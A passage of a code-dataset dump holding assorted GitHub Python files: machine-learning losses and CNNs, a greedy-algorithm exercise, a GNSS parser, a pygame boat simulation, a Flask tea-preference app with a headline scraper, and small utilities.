BinaryCrossEntropy(),\r\n \"categorical_crossentropy\": CategoricalCrossEntropy()\r\n\r\n}","repo_name":"AkiRusProd/numpy-diffusion","sub_path":"diffusion/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"40979126630","text":"from sys import stdin\nfrom collections import defaultdict\nstdin = open(\"Greedy/input.txt\",'r')\ninput = stdin.readline\n\nn, k = map(int, input().strip().split())\nelect = list(map(int, input().strip().split()))\nresult = 0\n\nin_plug = defaultdict(int)\ns_idx = i = 0\n\nwhile sum(in_plug.values()) < n: # 플러그 개수만큼 우선 사용 차감 반영\n if not in_plug[elect[i]]: # 아직 플러그에 안 꽂은 제품이면\n in_plug[elect[i]] = 1 # 플러그에 사용중 표시\n # 이미 꽂혀있는 제품이면\n s_idx += 1\n i += 1\n if i == k-1:\n break\n\n\nfor i in range(s_idx, len(elect)):\n breaker = False\n if not in_plug[elect[i]]: # 아직 플러그에 안 꽂은 제품이면 무언가 뽑아야 함\n del in_plug[elect[i]]\n # 다음에 안 쓰는 제품이 꽂혀있으면 먼저 뽑는다.\n for e in in_plug.keys():\n if e not in elect[i+1:]:\n del in_plug[e]\n result += 1 \n in_plug[elect[i]] = 1\n now = i\n breaker = True\n break\n \n if not breaker:\n # 모두 다음에도 사용하는 제품이면,\n # 플러그에 꽂힌 제품들이 언제 사용되는지 보고,\n # 가장 나중에 사용될 제품을 뽑는다.\n candidates = {}\n while True:\n for e in in_plug.keys():\n for j in range(i, k):\n if e == elect[j]: # 중복값 들어오면 작은 값으로 넣는 과정 필요\n candidates[e] = [j, e]\n break\n break\n \n candidates = sorted(candidates.values(), key= lambda x: x[0], reverse=True)\n del in_plug[candidates[0][1]]\n result += 1\n in_plug[elect[i]] = 1 # 플러그에 사용중 표시\n \nprint(result)","repo_name":"Suyeon-B/week04_team","sub_path":"suyeon/Greedy/1700 멀티탭 스케줄링 reretry.py","file_name":"1700 멀티탭 스케줄링 reretry.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"21873944922","text":"from .fitter import AutoCatFitter\nfrom .predictor import AutoCatPredictor\nfrom .file_io import DataReader\nfrom .scaler import Scaler\nfrom .defaults import BATCH_SIZE\nfrom .base import AutoCatTrain\nimport numpy as np\n\n\nclass AutoCat(object):\n def __init__(self, reference_lib=None):\n self.scaler = Scaler()\n self.metrics = {}\n self.data_r = \"\"\n self.data_len = 0\n self.batch_size = BATCH_SIZE\n self.reference_lib = reference_lib\n\n def fit(\n self, data, optimise_time=3600, weight=False\n ): # if file, expected to have header row\n smiles, targets = self.check_input(data)\n self.scaler.get_params(targets)\n training_params = AutoCatTrain().train_params(targets)\n\n if self.data_r == \"\" or self.data_len <= self.batch_size:\n self.fitter = AutoCatFitter(\n self.scaler,\n training_params=training_params,\n features_file=self.reference_lib,\n )\n else:\n self.fitter = AutoCatFitter(\n self.scaler,\n training_params=training_params,\n features_file=self.reference_lib,\n batch=True,\n data_r=self.data_r,\n batch_size=self.batch_size,\n data_len=self.data_len,\n )\n\n if weight:\n self.fitter.weight_labels(targets)\n\n if optimise_time > 0:\n self.fitter.optimise_search(smiles, targets, time_budget=optimise_time)\n\n self.metrics = self.fitter.fit(smiles, targets)\n return self.metrics\n\n def predict(self, data, smiles_col=0):\n if type(data) == np.ndarray:\n smiles = data\n elif type(data) == str:\n data_r = DataReader(data)\n smiles = data_r.read_smiles(smiles_col=smiles_col)\n\n if self.metrics != {}: # If there is a fitter trained in this AutoCat object\n self.predictor = AutoCatPredictor(features_file=self.reference_lib)\n self.predictor.set_model(self.fitter.get_model())\n\n return self.predictor.predict(smiles, self.scaler)\n\n def save(self, file_path, as_onnx=False):\n file_name = file_path.split(\".\")\n if as_onnx:\n if self.y.shape[1] > 1:\n raise Exception(\"Multiregression models cannot be saved in onnx format\")\n self.fitter.save_model(file_name[0] + \".onnx\", \"onnx\")\n else:\n self.fitter.save_model(file_name[0] + \".cbm\", \"cbm\")\n self.fitter.save_metrics(file_name[0] + \"_metrics.json\")\n self.fitter.save_weights(file_name[0] + \"_weights.json\")\n self.scaler.save(file_name[0] + \"_scaler.json\")\n\n def load(self, file_path):\n self.predictor = AutoCatPredictor(features_file=self.reference_lib)\n file_name = file_path.split(\".\")\n if file_name[-1] == \"onnx\":\n self.predictor.load_onnx(file_path)\n elif file_name[-1] == \"cbm\":\n self.predictor.load_cbm(file_path)\n self.scaler.load(file_name[0] + \"_scaler.json\")\n\n # TO DO save and load training params\n def retrain(self, model_path, data):\n file_name = model_path.split(\".\")\n self.scaler.load(file_name[0] + \"_scaler.json\")\n smiles, targets = self.check_input(data)\n training_params = AutoCatTrain().train_params(targets)\n\n if self.data_r == \"\" or self.data_len <= self.batch_size:\n self.fitter = AutoCatFitter(\n self.scaler,\n training_params=training_params,\n features_file=self.reference_lib,\n )\n else:\n self.fitter = AutoCatFitter(\n self.scaler,\n training_params=training_params,\n features_file=self.reference_lib,\n batch=True,\n data_r=self.data_r,\n batch_size=self.batch_size,\n data_len=self.data_len,\n )\n self.fitter.load_weights(file_name[0] + \"_weights.json\")\n\n self.metrics = self.fitter.fit(smiles, targets, retrain=model_path)\n return self.metrics\n\n def check_input(self, data):\n if type(data) == list:\n self.data_len = 
len(data[0])\n smiles = data[0]\n targets = data[1]\n\n elif type(data) == str:\n self.data_r = DataReader(data)\n self.data_len = self.data_r.read_length()\n if self.data_len <= self.batch_size:\n smiles, targets = self.data_r.get_fold(0, self.data_len)\n else:\n smiles, targets = self.data_r.get_fold(0, self.batch_size)\n if self.data_len % self.batch_size != 0:\n print(\n \"Warning - training dataset is not a multiple of batch size:\",\n self.batch_size,\n )\n return smiles, targets\n","repo_name":"ersilia-os/autocat-chem","sub_path":"core/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":4902,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"4986401896","text":"import tensorflow as tf\n\nfrom Caster.utils import shape_utils\n\n\nclass SequenceCrossEntropyLoss(object):\n \"\"\"\n 识别文本序列与标签文本序列的交叉熵损失\n \"\"\"\n def __init__(self,\n sequence_normalize=None,\n sample_normalize=None,\n weight=None):\n\n self._sequence_normalize = sequence_normalize\n self._sample_normalize = sample_normalize\n self._weight = weight\n\n \n def __call__(self, logits, labels, lengths, scope=None):\n \"\"\"\n Args:\n logits: float32 tensor with shape [batch_size, max_time, num_classes]\n labels: int32 tensor with shape [batch_size, max_time]\n lengths: int32 tensor with shape [batch_size]\n \n tf.nn.sparse_softmax_cross_entropy_with_logits:\n A common use case is to have logits and labels of shape [batch_size, num_classes], \n but higher dimensions are supported, in which case the dim-th dimension is assumed \n to be of size num_classes. logits and labels must have the same dtype (either float16, \n float32, or float64).\n \"\"\"\n with tf.name_scope(scope, 'SequenceCrossEntropyLoss', [logits, labels, lengths]):\n # 原始交叉熵损失\n raw_losses = tf.nn.sparse_softmax_cross_entropy_with_logits(\n labels=labels, logits=logits\n )\n batch_size, max_time = shape_utils.combined_static_and_dynamic_shape(labels)\n \n # 计算指定序列长度以内的损失\n mask = tf.less(tf.tile([tf.range(max_time)],[batch_size,1]), tf.expand_dims(lengths,1), name='mask')\n masked_losses = tf.multiply(raw_losses, tf.cast(mask, tf.float32), name='masked_losses') # => [batch_size, max_time]\n row_losses = tf.reduce_sum(masked_losses, 1, name='row_losses') # 序列不同时刻损失值和 [batch_size]\n \n # 损失序列长度归一化\n if self._sequence_normalize:\n loss = tf.truediv(row_losses, tf.cast(tf.maximum(lengths),1),tf.float32, name='seq_normed_losses')\n \n loss = tf.reduce_sum(row_losses)\n \n # 损失batch归一化\n if self._sample_normalize:\n loss = tf.truediv(loss, tf.cast(tf.maximum(batch_size, 1),tf.float32))\n\n # 交叉熵损失权值\n if self._weight:\n loss = loss * self._weight\n return loss\n \n\n\nclass STNRegressionLoss(object):\n \"\"\"\n STN矫正定位网络回归损失(平方损失)\n \"\"\"\n def __init__(self, weight):\n self._weight = weight\n\n\n def __call__(self, prediction, target, scope=None):\n \"\"\"\n Args:\n prediction: float32 tensor with shape [batch_size, 2 * num_control_point]\n target: int32 tensor with shape [batch_size, 2 * num_control_point]\n \"\"\"\n with tf.name_scope(scope, 'STNRegressionLoss', [prediction, target]):\n diff = prediction - target\n losses = tf.reduce_sum(tf.square(diff), axis=1) # 2K维度计算损失和\n loss = tf.reduce_mean(losses, axis=0) # batch维度计算平均损失\n\n # 关键点回归损失权值\n if self._weight:\n loss = loss * self._weight\n return loss\n","repo_name":"ChenCongGit/Caster","sub_path":"model/model/Loss.py","file_name":"Loss.py","file_ext":"py","file_size_in_byte":3362,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
+{"seq_id":"6355932004","text":"\n# Import modules.\nimport os\nimport time\nfrom datetime import date, timedelta\nfrom gnsscal import date2gpswd\nfrom Parsing.support_parsing_functions import parse_file\n\nfilesep = os.sep\n\nstart_time = time.time()\n\n\ndef parse_binary_file(binary_file, exe_dir, model):\n # Obtain directory to file.\n week_number, week_day_number = int(binary_file[:4]), int(binary_file[5])\n binary_dir = model.binary_dir + filesep + str(week_number) + filesep + binary_file\n\n # Determine if the file exists within binary_dir. Otherwise, return an error.\n if model.reduced:\n success, msg = parse_file(binary_dir, model.CSV_dir, exe_dir, model.PRNs_to_parse, week_number,\n week_day_number, time_range=model.set_time_range, start_time=model.time_start_value,\n end_time=model.time_end_value)\n if not success:\n return False, msg\n if model.raw:\n success, msg = parse_file(binary_dir, model.CSV_dir, exe_dir, model.PRNs_to_parse, week_number,\n week_day_number, reduced_or_raw='raw', time_range=model.set_time_range,\n start_time=model.time_start_value, end_time=model.time_end_value)\n if not success:\n return False, msg\n return True, 'Success'\n\n\n# ----------- PARSING (NovAtel receivers only) ------------ #\ndef run_parsing(model, exe_dir):\n # Process the dates. Obtain the names of the binary files.\n start_year, start_month, start_day = model.start_date\n end_year, end_month, end_day = model.end_date\n number_of_days = (date(end_year, end_month, end_day) - date(start_year, start_month, start_day)).days\n if number_of_days < 0:\n print('Error: The selected end date must be after the start date.')\n days = [date(start_year, start_month, start_day) + timedelta(days=i) for i in range(number_of_days + 1)]\n binary_files = [str(date2gpswd(day)[0]) + '_' + str(date2gpswd(day)[1]) + '_00_' + model.receiver_name + '.GPS' for\n day in days]\n\n # Parse the binary files.\n for binary_file in binary_files:\n\n # Parse file.\n success, error = parse_binary_file(binary_file, exe_dir, model)\n if not success:\n print(error)\n","repo_name":"nicolasgapa/EISA","sub_path":"EISA-master/Parsing/parsing.py","file_name":"parsing.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"6412405868","text":"import pygame.display\nfrom math import sin, cos, radians, copysign\n\n\nclass Boat:\n def __init__(self, pos_x, pos_y):\n self.pos_x = pos_x\n self.pos_y = pos_y\n self.vel = 10\n self.heading = 90\n self.rudder = 0\n self.turn = 0\n\n self.length = 100\n self.width = 38\n\n self.boat_img = pygame.image.load('assets/boat_sprite.png')\n self.boat_img = pygame.transform.smoothscale(self.boat_img, (self.length, self.width))\n\n self.water_img_width = 450\n self.water_img_height = 450\n self.water_img = pygame.image.load('assets/water_sprite.jpg')\n self.water_img = pygame.transform.scale(self.water_img, (self.water_img_width, self.water_img_height))\n\n def update(self):\n self.heading = self.heading % 360\n\n max_rudder = 50\n max_vel = 40\n\n if self.rudder > max_rudder:\n self.rudder = max_rudder\n elif self.rudder < -max_rudder:\n self.rudder = -max_rudder\n\n if self.vel > max_vel:\n self.vel = max_vel\n elif self.vel < 0:\n self.vel = 0\n\n self.move()\n\n max_width = pygame.display.Info().current_w\n max_height = pygame.display.Info().current_h\n if self.pos_x > max_width:\n self.pos_x = 0\n if self.pos_x < 0:\n self.pos_x = max_width\n if self.pos_y > max_height:\n self.pos_y = 0\n if self.pos_y < 0:\n self.pos_y = max_height\n\n def move(self):\n self.turn += copysign(self.rudder ** 2, self.rudder) / 200\n\n if self.turn > 50:\n self.turn = 50\n elif self.turn < -50:\n self.turn = -50\n\n self.turn = self.turn * min((self.vel / 200 + 0.90), 0.95)\n\n if self.vel == 0:\n self.turn = 0\n\n self.heading += self.turn / ((self.vel + 10) * 4)\n self.turn = self.turn * 0.95\n\n self.pos_x = self.pos_x + self.vel * cos(radians(self.heading)) / 10\n self.pos_y = self.pos_y - self.vel * sin(radians(self.heading)) / 10\n","repo_name":"AleksanderZawisza/Fuzzy-Boat","sub_path":"app/boat.py","file_name":"boat.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"23070263146","text":"import os\nfrom forms import InfoForm, AddTeaForm\n\nfrom flask import Flask, request, render_template, flash, session, redirect, url_for, session\n\nfrom wtforms.validators import DataRequired\nimport shutil\nimport requests\nfrom datetime import datetime\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\nfrom validate_email import validate_email\nimport csv\nimport re\nfrom bs4 import BeautifulSoup\nfrom flask_restful import Api,Resource\n\n\n# This grabs our directory\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\napp = Flask(__name__)\n# Key for Forms\napp.config['SECRET_KEY'] = 'mysecretkey'\n\n# Connects our Flask App to our Database\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(basedir, 'data.sqlite')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\n# create sqlite db \ndb = SQLAlchemy(app)\n# Add on migration capabilities in order to run terminal commands\nMigrate(app,db)\napi = Api(app)\n\n###################################\n# MODELS\n# it inherit from db.Model class\nclass User(db.Model):\n\n # The default table name will be the class name\n __tablename__ = 'User'\n\n ## CREATE THE COLUMNS FOR THE TABLE \n # Primary Key column, unique id for each user\n id = db.Column(db.Integer,primary_key=True)\n # Username\n username = db.Column(db.Text)\n # User email\n email = db.Column(db.Text)\n\n # This is a one-to-one relationship\n # A user can have only one fav type of tea\n tea = db.relationship('Tea',backref='user',uselist=False)\n\n # This sets what an instance in this table \n def __init__(self,username,email):\n self.username = username\n self.email = email\n\n def json(self):\n return {'username': self.username, 'email': self.email }\n\n def __repr__(self):\n if self.tea:\n # This is the string representation of a user in the model\n return f\"User {self.username}'s email' is {self.email}, user ID:{self.id}, his/her fav tea is {self.tea.tea_choice}\"\n else:\n return f\"User {self.username}'s email' is {self.email}, user ID:{self.id}, no tea yet.\"\n \n def report_tea(self):\n print(\"Here is my fav tea!\")\n print(self.tea) \n \n\nclass Tea(db.Model):\n\n # The default table name will be the class name\n __tablename__ = 'Tea'\n\n ## CREATE THE COLUMNS FOR THE TABLE \n # Primary Key column, unique id for each user\n id = db.Column(db.Integer,primary_key=True)\n # Username\n temperature = db.Column(db.Text)\n # User email\n tea_choice = db.Column(db.Text)\n\n # Connect the tea to the user that owns it.\n user_id = db.Column(db.Integer,db.ForeignKey('User.id'))\n\n # This sets what an instance in this table \n def __init__(self,temperature,tea_choice,user_id):\n self.temperature = temperature\n self.tea_choice = tea_choice\n self.user_id = user_id\n\n def json(self):\n return {'temperature': self.temperature, 'tea_choice': self.tea_choice, 'user_id': self.user_id,}\n\n def __repr__(self):\n # This is the string representation of a tea in the model\n if self.user_id:\n return f\"Tea {self.tea_choice}'s temperature is {self.temperature}, ID:{self.id}, user is {self.user_id}\"\n else:\n return f\"Tea {self.tea_choice}'s temperature is {self.temperature}, ID:{self.id}, no users yet\"\n\n\n\nproxies = {'http' : 'http://10.10.0.0:0000', \n 'https': 'http://120.10.0.0:0000'}\n\n# library to generate user agent\nfrom user_agent import generate_user_agent\n\nurl='https://www.nytimes.com/'\n\n# generate a user agent\nheaders = {'User-Agent': generate_user_agent(device_type=\"desktop\", 
os=('mac', 'linux'))}\n#headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.63 Safari/537.36'}\npage_response = requests.get(url, timeout=5, headers=headers)\n\n\n# website scraping\ntitles_list = []\n\n\ndef scraper():\n try:\n data = requests.get(url, timeout=5)\n if page_response.status_code == 200:\n\n html = BeautifulSoup(data.text, 'html.parser')\n\n titles = html.select('h2 span')\n\n try:\n for title in titles:\n titles_list.append(title.string)\n\n except IndexError:\n return 'No matching element found.' \n\n\n # write titles_list into csv file\n with open('index.csv', 'a') as csv_file:\n writer = csv.writer(csv_file)\n writer.writerow([titles_list, datetime.now()])\n else:\n print(page_response.status_code)\n # notify, try again\n except requests.Timeout as e:\n print(\"It is time to timeout\")\n print(str(e))\n return titles_list \n\nscraper()\n\n\n@app.route('/tea_form', methods=['GET', 'POST'])\ndef tea():\n # Create instance of the form.\n form = InfoForm()\n \n # Grab the data from the breed on the form.\n if form.validate_on_submit(): \n session['temperature'] = form.temperature.data\n session['tea_choice'] = form.tea_choice.data\n\n flash(f\"You just changed your tea_choice to: {session['tea_choice']}\")\n\n return redirect(url_for(\"thankyou\"))\n\n return render_template('tea.html', form=form)\n\n@app.route('/add_tea', methods=['GET', 'POST'])\ndef add_tea():\n # Create instance of the form.\n form = AddTeaForm()\n \n # Grab the data from the breed on the form.\n if form.validate_on_submit(): \n temperature = form.temperature.data\n tea_choice = form.tea_choice.data\n user_id = User.query.first().id\n \n # Add new tea to DB\n new_tea = Tea(temperature,tea_choice,user_id)\n db.session.add(new_tea)\n db.session.commit()\n\n\n return redirect(url_for(\"list_tea\"))\n\n return render_template('add_tea.html', form=form)\n\n@app.route('/userslist')\ndef list_user():\n # Grab a list of users from database.\n users = User.query.all()\n return render_template('userslist.html', users=users)\n\n@app.route('/tealist')\ndef list_tea():\n # Grab a list of tea from database.\n tea = Tea.query.all()\n return render_template('tealist.html', tea=tea)\n\n@app.route('/')\ndef index():\n return render_template('index.html',titles_list=titles_list)\n\n@app.route('/signup_form')\ndef signup_form():\n return render_template('signup_form.html')\n\n@app.route('/thankyou')\ndef thankyou():\n username = request.args.get('username')\n \n return render_template('thankyou.html',username=username)\n\n@app.route('/cn/')\ndef cn(name):\n return render_template('chinese.html',name=name)\n\n\n@app.route('/report')\ndef report(): \n username = request.args.get('username')\n email = request.args.get('email')\n\n lower_letter = False\n upper_letter = False\n num_end = False\n validatedemail = False\n\n if (username and email):\n lower_letter = any(letter.islower() for letter in username)\n upper_letter = any(letter.isupper() for letter in username)\n num_end = username[-1].isdigit()\n validatedemail = validate_email(email)\n\n report = lower_letter and upper_letter and num_end and validatedemail\n \n if report:\n # if user info is validated, pass it to DB\n new_user = User(username, email)\n db.session.add(new_user)\n db.session.commit()\n\n return render_template('report.html',\n username=username,report=report,\n lower_letter=lower_letter,\n upper_letter=upper_letter,\n num_end=num_end,\n validatedemail = validatedemail)\n else:\n return 
redirect(url_for('index'))\n\n@app.route('/user/<name>')\ndef user(name):\n return 'This is a page for {}'.format(name.upper())\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template('404.html'),404\n\nclass AllTea(Resource):\n\n def get(self):\n tea = Tea.query.all()\n\n if tea:\n # return json of teas\n return [t.json() for t in tea]\n else:\n return {'tea_choice':'not found'}, 404\n\n\nclass AllUsers(Resource):\n\n def get(self):\n users = User.query.all()\n\n if users:\n # return json of users\n return [user.json() for user in users]\n else:\n return {'username':'not found'}, 404\n\napi.add_resource(AllTea,'/teas')\napi.add_resource(AllUsers,'/users')\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"AbbyBiying/Tea-Time","sub_path":"basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":8427,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"71100509447","text":"import random\n\ndef binary_search(L, t, low, high):\n while low <= high:\n mid = (low + high) // 2\n if L[mid] == t:\n return True\n elif L[mid] < t:\n low = mid + 1\n else:\n high = mid - 1\n return False\n\n\nif __name__ == \"__main__\":\n L = [random.randint(0,30) for _ in range(20)]\n L.sort()\n\n print(L)\n print(binary_search(L, 14, 0, len(L)-1))","repo_name":"douzujun/Python-Foundation-Suda","sub_path":"上机题目和面试题整理/Python-Foundation-Suda-master/02_MOOC习题/04_2二分查找.py","file_name":"04_2二分查找.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"16"}
+{"seq_id":"36467695351","text":"# -*- coding:utf-8 -*-\nfrom celery import Celery\n\n\napp = Celery('tasks')\n\napp.config_from_object(\"celeryconfig\")\n\n\n\n@app.task\ndef add(x, y):\n return x + y\n\n@app.task\ndef error_handler(uuid):\n result = AsyncResult(uuid)\n exc = result.get(propagate=False)\n print('Task {0} raised exception: {1!r}\\n{2!r}'.format(\n uuid, exc, result.traceback))","repo_name":"ShichaoMa/old-spider","sub_path":"test/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"25013360527","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar 8 21:30:29 2019\r\n\r\n@author: Vincent\r\n\"\"\"\r\n\r\nfrom __future__ import print_function\r\nimport torch\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom scipy.stats import zscore\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nfrom sklearn.model_selection import train_test_split\r\nfrom torch.utils.data import DataLoader\r\nimport cv2 as cv\r\nimport matplotlib.pyplot as plt\r\nfrom torchvision.models import vgg\r\n\r\n#either uses GPU or CPU, depending if cuda is available\r\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\r\n\r\n#the neural networks we are testing\r\nclass Net1(nn.Module):\r\n \r\n def __init__(self, num_classes=10):\r\n super(Net1, self).__init__()\r\n self.layer1 = nn.Sequential(\r\n nn.Conv2d(1, 16, kernel_size=4, stride=1, padding=2),\r\n nn.BatchNorm2d(200),\r\n nn.ReLU(),\r\n nn.MaxPool2d(kernel_size=2, stride=2))\r\n self.layer2 = nn.Sequential(\r\n nn.Conv2d(16, 32, kernel_size=4, stride=1, padding=2),\r\n nn.BatchNorm2d(50),\r\n nn.ReLU(),\r\n nn.MaxPool2d(kernel_size=2, stride=2))\r\n self.fc = nn.Linear(50*17*17, num_classes)\r\n \r\n def forward(self, x):\r\n out = self.layer1(x)\r\n #print(out.shape)\r\n out = self.layer2(out)\r\n #print(out.shape)\r\n out = out.reshape(-1, 50*17*17)\r\n out = self.fc(out)\r\n return out\r\n\r\nclass Net2(nn.Module):\r\n def __init__(self, num_classes=10):\r\n super(Net2, self).__init__()\r\n self.layer1 = nn.Sequential(\r\n nn.Conv2d(in_channels=1, out_channels=16, kernel_size=4, padding=1, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2))\r\n self.layer2 = nn.Sequential(\r\n nn.Conv2d(in_channels=16, out_channels=32, kernel_size=4, padding=1, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2))\r\n self.layer3 = nn.Sequential(\r\n nn.Conv2d(in_channels=32, out_channels=64, kernel_size=4, padding=1, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2))\r\n self.layer4 = nn.Sequential(\r\n nn.Conv2d(in_channels=64, out_channels=128, kernel_size=4, padding=1, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2)) \r\n self.layer5 = nn.Sequential(\r\n nn.Conv2d(in_channels=128, out_channels=256, kernel_size=4, padding=1, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2)) \r\n self.fc = nn.Linear(256, num_classes)\r\n \r\n def forward(self, x):\r\n in_size=x.size(0)\r\n out = self.layer1(x)\r\n #print(out.shape)\r\n out = self.layer2(out)\r\n #print(out.shape)\r\n out = self.layer3(out)\r\n #print(out.shape)\r\n out = self.layer4(out)\r\n #print(out.shape)\r\n out = self.layer5(out)\r\n #print(out.shape)\r\n out = out.view(in_size, -1)\r\n out = self.fc(out)\r\n return out\r\n\r\nclass Net3(nn.Module):\r\n def __init__(self, num_classes=10):\r\n super(Net3, self).__init__()\r\n self.layer1 = nn.Sequential(\r\n nn.Conv2d(in_channels=1, out_channels=16, kernel_size=4, padding=2, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2))\r\n self.layer2 = nn.Sequential(\r\n nn.Conv2d(in_channels=16, out_channels=32, kernel_size=4, padding=2, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2))\r\n self.layer3 = nn.Sequential(\r\n nn.Conv2d(in_channels=32, out_channels=64, kernel_size=4, padding=2, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2))\r\n self.layer4 = nn.Sequential(\r\n nn.Conv2d(in_channels=64, out_channels=128, kernel_size=4, 
padding=2, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2)) \r\n self.layer5 = nn.Sequential(\r\n nn.Conv2d(in_channels=128, out_channels=256, kernel_size=4, padding=2, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2)) \r\n self.layer6 = nn.Sequential(\r\n nn.Conv2d(in_channels=256, out_channels=128, kernel_size=4, padding=2, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2)) \r\n self.fc1 = nn.Linear(128, 128)\r\n self.fc2 = nn.Linear(128, num_classes)\r\n \r\n def forward(self, x):\r\n in_size=x.size(0)\r\n out = self.layer1(x)\r\n #print(out.shape)\r\n out = self.layer2(out)\r\n #print(out.shape)\r\n out = self.layer3(out)\r\n #print(out.shape)\r\n out = self.layer4(out)\r\n #print(out.shape)\r\n out = self.layer5(out)\r\n #print(out.shape)\r\n out = self.layer6(out)\r\n #print(out.shape)\r\n out = out.view(in_size, -1)\r\n out = self.fc1(out)\r\n out = self.fc2(out)\r\n return out\r\n \r\n#A custom dataset for our images and labels\r\nclass CustomDataset(torch.utils.data.Dataset):\r\n def __init__(self, X_tensor, y_tensor):\r\n self.X_tensor = X_tensor\r\n self.y_tensor = y_tensor\r\n return\r\n def __getitem__(self, index):\r\n self.img = self.X_tensor[index]\r\n label = self.y_tensor[index]\r\n return (self.img,label)\r\n def __len__(self):\r\n return self.X_tensor.size()[0]\r\n\r\n#function that preproceses our images\r\ndef preprocess(images):\r\n \r\n images = images/255\r\n images[images < 0.90] = 0\r\n images[images > 0] = 1\r\n \r\n for i in range(len(images)):\r\n \r\n image = images[i] \r\n image=np.array(image, dtype='uint8') \r\n \r\n contours,_ = cv.findContours(image, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_NONE)\r\n \r\n largest_area = 0\r\n for contour in contours:\r\n \r\n coor1, coor2, width, height = cv.boundingRect(contour)\r\n \r\n side = max(width, height)\r\n \r\n area = side * side\r\n \r\n if area > largest_area:\r\n largest_area = area\r\n larC1, larC2, larW, larH = coor1, coor2, width, height\r\n \r\n \r\n largest_digit = image[larC2:larC2+larH,larC1:larC1+larW]\r\n \r\n [rows,cols] = largest_digit.shape\r\n if rows>cols:\r\n difference = rows - cols\r\n if difference%2 !=0:\r\n difference += 1 \r\n image = np.concatenate((np.zeros((rows,int(difference/2))),largest_digit,np.zeros((rows,int(difference/2)))), axis=1)\r\n elif rows best_model_accuracy:\r\n \r\n print(\"DAMN!!! 
Good Job <3!!!\")\r\n torch.save(net.state_dict(), 'best_model.ckpt')\r\n best_model_accuracy = accuracy\r\n \r\n #gives the accuracy of our model on each of the labels, separately\r\n for i in range(10):\r\n print('Accuracy of %d : %2d %%' % (\r\n i, 100 * class_correct[i] / class_total[i]))\r\n \r\n loss_accuracy_lr[epoch, 0] = loss.item() #loss on training set\r\n loss_accuracy_lr[epoch, 1] = (100 * correct / total) #accuracy on valid set\r\n loss_accuracy_lr[epoch, 2] = epoch #nb of epochs\r\n \r\n return best_model_accuracy\r\n\r\n#return the prediction on our validation set, which an array of tensors\r\n#as input (not the dataloader)\r\ndef getPredictionsValidation(test_images):\r\n predicted = np.zeros((len(test_images)))\r\n for i in range(len(test_images)):\r\n image = test_images[i,:,:,:]\r\n image = image.reshape(1,1,64,64)\r\n output = net(image)\r\n _, predicted[i] = torch.max(output.data, 1)\r\n \r\n return predicted\r\n\r\n#return a list of the wrongly labeled images in the test set (aka validation set)\r\ndef getWrongs(predicted, y_tensor_test):\r\n \r\n y_tensor_test = y_tensor_test.numpy()\r\n \r\n wrongs = []\r\n for i in range(len(predicted)):\r\n if predicted[i] != y_tensor_test[i]:\r\n wrongs.append(i)\r\n \r\n return wrongs\r\n\r\n#function that pre process the images for them to be used on the VGG model\r\ndef VGG_get_loaders():\r\n \r\n train_images = pd.read_pickle('train_images.pkl')\r\n train_labels = pd.read_csv('train_labels.csv')\r\n\r\n train_images = preprocess(train_images)\r\n train_images = train_images.reshape((40000,1,64,64))\r\n train_images_3 = np.zeros((40000,3,64,64))\r\n \r\n train_images_3[:,0,:,:] = train_images\r\n train_images_3[:,1,:,:] = train_images\r\n train_images_3[:,2,:,:] = train_images\r\n train_images = train_images_3\r\n \r\n #Pre-Process the csv-files of the labels \r\n train_labels = train_labels.drop(['Id'], axis=1)\r\n train_labels = 